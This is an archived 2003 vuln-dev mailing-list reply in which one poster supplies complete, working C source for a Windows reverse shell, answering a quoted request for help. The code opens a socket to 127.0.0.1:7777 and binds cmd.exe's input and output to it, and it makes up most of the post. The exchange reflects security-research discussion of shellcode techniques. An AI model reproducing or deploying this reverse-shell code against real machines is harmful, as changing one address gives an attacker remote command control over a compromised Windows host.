Re: Windows reverse Shell

From: 3APA3A (3APA3Aat_private)
Date: Tue Feb 04 2003 - 08:34:56 PST

  • Next message: 3APA3A: "Re[2]: Windows reverse Shell" 

    Dear NetNinja,

Code below successfully brings reverse shell to 127.0.0.1:7777.

#include <windows.h>
#include <winsock2.h>
#include <stdio.h>

int main(int argc, char* argv[]){
 WSADATA wd;
 HANDLE h;
 SOCKET sock;
 STARTUPINFO si;
 PROCESS_INFORMATION  pi;
 struct sockaddr_in sin;
 int size = sizeof(sin);



 memset(&sin, 0, sizeof(sin));
 memset(&si, 0, sizeof(si));
 WSAStartup(MAKEWORD( 1, 1 ), &wd);
 sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
 sin.sin_family = AF_INET;
 bind(sock, (struct sockaddr*)&sin, size);
 sin.sin_port = htons(7777);
 sin.sin_addr.s_addr = inet_addr("127.0.0.1");
 connect(sock, (struct sockaddr*)&sin, size);
 si.cb = sizeof(si);
 si.dwFlags = STARTF_USESTDHANDLES;
 si.hStdInput = si.hStdOutput = si.hStdError = sock;
 CreateProcess(
        NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        0,
        0,
        NULL,
        &si,
        &pi
 );
 return 0;
}



--Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-devat_private:

N> Hello guys,

N> David Litchfield in his Blackhat talk, talked about using socket handle
N> from WSASocket() and pass that handle as a parameter to stdin, stdout
N> and stderr for CreateProcess function. By doin this way his reverse
N> cmd shellcode becomes much smaller. I tried coding that reverse
N> command shell in C, but couldnt get it to work. It simply connects to
N> my listening netcat listener and then disconnects. David Litchfield
N> used 4 functions to achieva that WSASocket, bind, connect and
N> CreateProcess. A lil help would b appreciated on building this reverse
N> cmd shell. thanx.
  



-- 
~/ZARAZA
Почтенные ископаемые! Жду от вас дальнейших писем.  (Твен)

    This archive was generated by hypermail 2b30 : Tue Feb 04 2003 - 09:35:03 PST